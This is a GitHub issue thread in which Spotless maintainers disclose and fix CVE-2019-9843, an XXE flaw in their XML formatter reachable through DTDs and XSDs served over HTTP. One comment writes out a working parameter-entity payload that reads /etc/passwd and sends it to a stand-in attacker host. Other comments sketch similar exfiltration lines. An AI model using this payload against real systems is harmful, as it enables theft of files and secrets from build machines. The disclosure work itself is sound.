CVE-2019-9843: The XML parser isn't respecting resolveExternalEntities as false

JLLeitschuh commented 5 years ago

Original Comment: https://github.com/diffplug/spotless/issues/308#issuecomment-463297964

12:48:55.013 [DEBUG] [sun.net.www.protocol.http.HttpURLConnection] Redirected from http://java.sun.com/xml/ns/javaee/javaee_5.xsd to http://www.oracle.com/webfolder/technetwork/jsc/xml/ns/javaee/javaee_5.xsd

If we are seeing HTTP get requests inside of the XML parser that means that the parser is vulnerable to XXE.

We need to fix this so that the spotless XML formatter is not making external entity requests.

We can't have our linting infrastructure making web requests. Especially web requests over HTTP as those can be maliciously intercepted by a MITM.

Here's an example where this has been a serious problem in the past.

https://research.checkpoint.com/parsedroid-targeting-android-development-research-community/

CC: @nedtwigg

This is a security vulnerability in spotless and should be treated as such.

nedtwigg commented 5 years ago

My understanding of the attack model you're worried about:

attacker creates a github project, which contains an XML file containing something like <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
victim clones github project, runs gradlew spotlessApply, which sends password to the attacker's server

Is the threat model posed by this XXE more dangerous than this?

attacker creates a github project, and the build.gradle contains upload('/etc/passwd', 'http://badguy')
victim clones github project, runs any gradle command, and the configuration step sends password to the attacker's server

Is this a fair comparison? Or am I misunderstanding a step that makes the XXE more dangerous?

jbduncan commented 5 years ago

Dealing with security bugs is a new area for me, so I personally don't know what's good procedure.

I understand some organisations do bug bounties, and that others ask reporters to discuss vulnerabilities with the organisation in private first. But I'm unsure if it's practical for us or DiffPlug to organise a bug bounty, or if discussing the bug via a private channel is something we should seriously consider doing.

@JLLeitschuh I'm thus wondering if you have any advice that may allow us to deal with this security bug in an efficient and/or ethical manner, or if you had any other thoughts regarding all this?

jbduncan commented 5 years ago

Just thinking out loud here: should we consider using a open source dependency vulnerability scanner to reduce the likelihood of things like this happening in the future?

nedtwigg commented 5 years ago

When I open a sourcefile in a text editor, I don't trust the author. I'm just inspecting its contents, and there's no way I should get a virus by examining source code.

When I compile and run a sourcefile, I am forced to either trust the author or run the code in a VM. I'm running the code that they wrote.

The XXE bug linked above was about an interactive tool where you could be victimized just by opening a file to inspect it. That is a vulnerability.

In the case of every software build, you are running code that somebody else wrote. If you don't trust them, you have no safe choice but to run it in a container.

The only reason that I can see why this might be a little more dangerous than a normal buildscript is that a malicious PR which contains changes to XML might not get the same level of codereview as a malicious PR which contains changes to the buildscript. But the only way you're getting hurt by this bug is if:

you run a buildscript from somebody you don't trust
somebody you do trust merged a PR without reviewing it

And in both cases, that is already true for everything about a gradle build. Please let me know if I'm misunderstanding.

JLLeitschuh commented 5 years ago

@nedtwigg This is an attack that can occur via a MITM.

For example, in this case spotless is making a request to http://java.sun.com/xml/ns/javaee/javaee_5.xsd

Notice how that XSD is being loaded over HTTP instead of HTTPS, that means if the builder is being MITMed the man in the middle can re-write that XSD to perform XXE.

This is true with DTD resources as well.

All an attacker has to do to a DTD is add the following payload to the DTD that they have MITM attacked and they can begin exfiltrating the contents of files from the build machine.

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://my.evil-host.com/x=%payload;">'>
%param1;
%external;

(This payload isn't listed on many of the example payload sites because it's rare to only control the DTD or the XSD; as is the case here. I ended up having to a lot of work to come up with this particular example payload, but it works against the java XML parser).

I know all this because finding XXE vulnerabilities in the java ecosystem has become a bit of a pet project for me. Expect more details in the future.

Here's the CVE number from a similar vulnerability in PMD: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7722

There will be more coming soon as I wrap up this project.

For now, we need to fix this in Spotless and then request a CVE number from MITRE.

https://cve.mitre.org/cve/request_id.html

JLLeitschuh commented 5 years ago

Just thinking out loud here: should we consider using an open source dependency vulnerability scanner to reduce the likelihood of things like this happening in the future?

This wouldn't have caught this particular instance. The issue with XXE and the reason that it's such a widespread issue is that, in almost all languages, XML parsers are vulnerable by default and you have to explicitly disable external entity processing.

Thankfully, the web world has begun to shift to json based formats for transmitting data which means that this problem is less likely in newer web-apps. That being said, many tools are still vulnerable to XXE because they were written back when XML was in vogue for configuration.

nedtwigg commented 5 years ago

Thanks, the MITM was the step I was missing. So the attack model is:

I clone a repo from someone I trust
They have an XML file with an external DTD over HTTP
Attacker MITM that external DTD, weaponizing it
I upload my passwords to that attacker when I run spotlessApply

JLLeitschuh commented 5 years ago

@nedtwigg Correct.

Another attack model is:

Developer writes/uses an XML file that has an external resource loaded over HTTP by accident (most people don't understand the risk).
They have an XML file with an external DTD over HTTP
Attacker MITM that external DTD, weaponizing it
Nieve user or build server (eg. jenkins) upload their passwords or any other file to that attacker when spotlessApply or spotlessCheck is run.

The original intent of the author of the code may not have been malicious, but purely out of nievity around how XML entities work, they are pwed.

JLLeitschuh commented 5 years ago

Does anyone have the resources to dig in and fix this within the next week or so? I'm currently pretty busy but I can try to get to it next week if nobody else is free.

Also, is this vulnerability in Spotless propper or the external library doing the formatting?

fvgh commented 5 years ago

Brief explanation why I don't consider this urgent:

Using XMLs in your sources which referring to external XSDs/DTDs which are not part of your project specific catalogue and not in the default catalogues has several flaws (no proper versioning, no local caching, ...).
Yes, some mean contributor can try to insert such an error on purpose and it might not get notice. So an additional protection by an explicit flag is good idea. @nedtwigg Keep in mind that some repo you do trust could have deactivated the flag since they don't care so much about version control (and security)
I am not convinced, that you can really exploit the vulnerability with the XSLSourceParser. I remember that Eclipse was quite picky when you defined file URIs. It wants the setup of the workspace catalogue. But I really would prefer to write a unit-test for it.

About the code:

Our preference setup
You can get the webtools sources from GitHub. Just filter the repositories for webtools.
I am afraid that the resolveExternalEntities is only used by the validator (we don't use the validator, so it is not configured either). It uses the resolveExternalEntities value to setup the Xerces Configuration

It would be interesting to know what the Xerces/JRE defaults are... Anyhow, I know that the initial URI lookup for the XML source model is not done by Xerces, but by the XML catalogue/cache manager. And I am not sure whether Xerces plays a role for the XML model setup.

@JLLeitschuh consider this as an introduction. Let me know if you want to take over...

jbduncan commented 5 years ago

@fvgh I admit that I'm unconvinced by your reasoning regarding external XSDs.

To give an example, by my understanding Spring Framework projects using XML files for configuration are are still a thing in Java land today, and in my experience every Spring XML file points to XSD files provided online by (I assume) the Spring Framework maintainers or Pivotal. But in a couple of tutorial sites which I quickly browsed just now, the Spring examples they give have XML files where the XSD files are provided over HTTP, not HTTPS, and I'd make a guess that people just copy and paste these example XML files into their Spring projects as-is without changing the protocol.

So the way I see it, people and organisations who still use Spring's XML configuration and decide to use Spotless's XML formatter with their Spring projects are at risk from MITM attacks as @JLLeitschuh described earlier.

jbduncan commented 5 years ago

@fvgh That being said, I don't know enough about XML and XSD/DTD to properly understand your other arguments, so I may have missed something. :)

JLLeitschuh commented 5 years ago

To give an example, by my understanding Spring Framework projects using XML files for configuration are are still a thing in Java land today, and in my experience every Spring XML file points to XSD files provided online by (I assume) the Spring Framework maintainers or Pivotal.

@jbduncan Just because the vulnerability is widespread doesn't mean it's not a security vulnerability.

Spring actually has a writeup about this: https://spring.io/blog/2016/08/24/check-your-spring-security-saml-config-xxe-security-issue

In the case of Spring, when Spring parses its own XML files, they probably use an internal resolver similar to the one that TestNG does here:

https://github.com/cbeust/testng/blob/0bbcebf2177e0bc4e0fd35c04dd9a2213574d219/src/main/java/org/testng/xml/TestNGContentHandler.java#L89-L94

TestNG looks internally to find the DTD first by loading it as a resource out of the testng.jar file.

Spotless doesn't have these resources so instead spotless is pulling these DTDs from the web over HTTP in an insecure method.

This internal resource loading is why TestNG and Spring are able to work when they are running on a machine disconnected from the internet. They aren't making HTTP or HTTPS requests out to external servers to resolve these DTDs.

fvgh commented 5 years ago

I am afraid we have quite a different view point. To clarify mine:

My background

I have no clue, not tested and never seen how DTDs ENTITY statements are treated within Eclipse. I only work with schemas. The URI lookup for DTDs and XSDs in Eclipse is the same. I know that part of the Eclipse code.

My initial intention for #308:

My spring4-mvc-gradle-xml-hello-world example in #308, which started this entire discussion was meant to show that missing catalogue entries may hamper your build.

To avoid further misunderstandings: I never said that a missing catalogue entry (for DTD or XSD) caused #308. Since I was never able to reproduce #308 I waited for further feedback.

I realized that many user may not expect a schema URI resolution from an XML formatter. Hence I provided the example to see whether there is an URI resolution in the projects of the people reported #308 and whether due to network timeouts the user gets the impression that that the build hangs "forever".

Why I don't feel strongly about resolveExternalEntities:

The Spring schema location lookup I demonstrated in my example from #308 is due to the following lines in the XML under test:

    xsi:schemaLocation="
        http://www.springframework.org/schema/beans     
        http://www.springframework.org/schema/beans/spring-beans.xsd
        http://www.springframework.org/schema/context 
        http://www.springframework.org/schema/context/spring-context.xsd ">

The term for the URI used for schema location lookup is location hint. This name (hint) should be taken literally. It is a hint where the schema may or may not be. It is the last resort you try if you can't find it. Location hints for old legacy code have the bad habit to become invalid since the company behind it is sold, re-branded, ...

Schema location hints should never be misused by a project for downloads, neither during its build nor after installation at customer side. You must ensure to provide it. When you want to know which catalogues are on your Linux OS, have a look at /etc/xml/catalog. JRE comes with an own set of catalogues. Java applications can extend these catalogues. Eclipse provides also an additional catalogue and all plugins can add more entries. The user can also add project specific catalogues.

Spotless WTP allows to insert an additional userCatalog .

So for me the HTTP request which started this discussion was intended to demonstrate a broken project and to figure out, whether this could really cause #308.

Proposal:

With respect to the many misunderstandings in this discussion, I think it is better to switch off the lookup by default.

To stress this point: I have no evidence and don't think that the Eclipse XMLSourceParser is vulnerable to the XXE scenario where a local file URI is used as external entity as described within this issue. This proposal has nothing to do with security. But I encourage of-course everybody to investigate further. Pleas have a look at the links I provided above. Just don't report a potential security vulnerability to Eclipse and reference this proposal.

I once done a bypass of the Eclipse WTP URI resolver when developing the initial Spotless WTP wrapper without the underlying OSGI framework. I wanted to avoid such a big deviation from the original Eclipse behaviour and therefore get more proves that it caused #308.

But I can understand that most users, just wanting their XML formatted, do not expect that the schemas are parsed and do not want/need to care about details like catalogues. I admit that my WTP formatter is unnecessarily complex in that respect for 90% of the use cases. Eclipse continues its formatting regardless whether the lookup of the URI was successful. Since therefore the formatting my be altered (for example once with and once without whitespace facets), the results differ. Hence the build results may become unstable due to little details in the XML structure model most users don't care about in the first place. This is no problem for Eclipse IDE, but for build tools.

nedtwigg commented 5 years ago

There's so much expertise in this thread! I've always used XML like json, this is a cool deep-dive for me. I've summarized the facts that I understand, and left checkboxes for the questions I have.

I think it's overkill, but I've added this warning to our changelog to flag the affected versions. With that overly cautious disclaimer in place, we can definitely take our time diagnosing and fixing this.

spotless XML definitely downloads schemas
- if served over HTTP, which is common, they could be MITM'ed to be malicious
- [ ] how malicious can a schema be?
[ ] does spotless XML download external DTD?
- if it does, HTTP MITM allows these to be as malicious as unintentional upload of /etc/passwd

fvgh commented 5 years ago

Sorry @nedtwigg , I am afraid your questions are too broad. You must distinguish between various implementations withing the WTP. XmlSourceParser is completely different to the validator. For for the validator the download is regulated by Eclipse code using resolveExternalEntities. Processing is done by Xerces. For XmlSourceParser it seems that the Eclipse developer did not consider this regulation necessary (can't imagine that they forgot it). The processing is done by Eclipse code. The XmlSourceParser is quite limited and quite picky when you try to lookup file via location hints or external entities (DTD). It always wants you to use a catalogue. So in the end I see two options:

Prove of XXE vulnerability (if possible as unit-test for WTP Eclipse) by

try&error
code analysis This prove is not done by triggering a download of XSD/DTD, but smuggling internal data into a second URI lookup.

I am afraid I have no time for this, since it is always hard to determine whether a vulnerability is not there or one has not looked hard enough. For the reasons I have given before (instability of build), I will provide a PR separate from this issue.

jbduncan commented 5 years ago

...

This is why TestNG and Spring are able to work when they are running on a machine disconnected from the internet. They aren't making HTTP or HTTP requests out to external servers to resolve these DTDs.

@JLLeitschuh Ahh, okay! I hadn't realised that the Spring Framework maintainers had already fixed this vulnerability in their side, which makes a lot of sense actually with hindsight, so thanks for the clarification. 👍

JLLeitschuh commented 5 years ago

~Supposedly the Eclipse Team has already been made aware of this issue as part of the Parse Droid Vulnerability from the Checkpoint team, I can reach out to the checkpoint team and make sure that they confirmed that Eclipse had patched the vulnerability (I have a connection on Linkedin). @fvgh Are you saying that you think that Eclipse may still be vulnerable to Parse Droid?~

I totally misread your comment @fvgh. Let me go back and re-parse it.

nedtwigg commented 5 years ago

Thanks to @fvgh's efforts in #369, I think 1.20.0-SNAPSHOT should have this fixed. Can we confirm and remove the warning message from future releases?

fvgh commented 5 years ago

I would prefer the word "obsolete" instead of "fix". Anyhow: With the default configuration the UTs provided with #369 shows that the external DTD/XSD files are not applied and with the resolveExternalURI set to true, it shows that the external DTD/XSD files are applied.

nedtwigg commented 5 years ago

Great. So for previous versions of the XML formatter, we have said

WARNING: xml formatter in this version may be vulnerable to XXE attacks (see #358).

And now we can say:

WARNING RESOLVED: By default, xml formatter no longer downloads external entities. You can opt-in to resolve external entities by setting resolveExternalURI to true. However, if you do opt-in, be sure that all external entities are referenced over https and not http, or you may be vulnerable to XXE attacks.

Is this wording acceptable to you, @fvgh & @JLLeitschuh?

fvgh commented 5 years ago

Perfect.

JLLeitschuh commented 5 years ago

Looks excellent!

JLLeitschuh commented 5 years ago

So we agree that Spotless was vulnerable to this? If so, I'll go forward and file for a CVE number. Important things to know before I file are: what version was this vulnerability introduced and what version was it fixed in?

Just a note, here's the CVE number for a similar vulnerability in Checkstyle. https://nvd.nist.gov/vuln/detail/CVE-2019-9658

nedtwigg commented 5 years ago

I agree it might have been vulnerable ;-) I think the point that @fvgh tried to make earlier was that yes eclipse is downloading DTDs that it shouldn't, but we don't know if it's using them for anything. IMO it's easier to ask users to upgrade than it is to figure this out all the way to the bottom, so I'm fine with assuming the worst and filing for a CVE. Bug is present in 1.15.0 -> 1.19.0, fixed in 1.20.0 (for lib and plugin-maven, 3.x for plugin-gradle).

nedtwigg commented 5 years ago

Fix released in 3.20.0 / 1.20.0, with the warnings as above. Happy to add CVE details as they become available :)

JLLeitschuh commented 5 years ago

Bug is present in 1.15.0 -> 1.19.0, fixed in 1.20.0 (for lib and plugin-maven, 3.x for plugin-gradle).

~Just to clarify, it's fixed in the Gradle plugin for version 3.20.0?~

You know what, if I just look at the changelog, it will tell me.

JLLeitschuh commented 5 years ago

@nedtwigg Here is the official CVE number:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9843

I've asked them to update the description a little bit. But the number will stay the same.

nedtwigg commented 5 years ago

Great! If you think that CVE should be anywhere in our docs or changelogs, feel free to put it there.

JLLeitschuh commented 5 years ago

I'm on vacation this week. Adding it to the changelog may make sense, but isn't important to do.

nedtwigg commented 5 years ago

Happy vacation!! Thanks for filing the CVE.

diffplug / spotless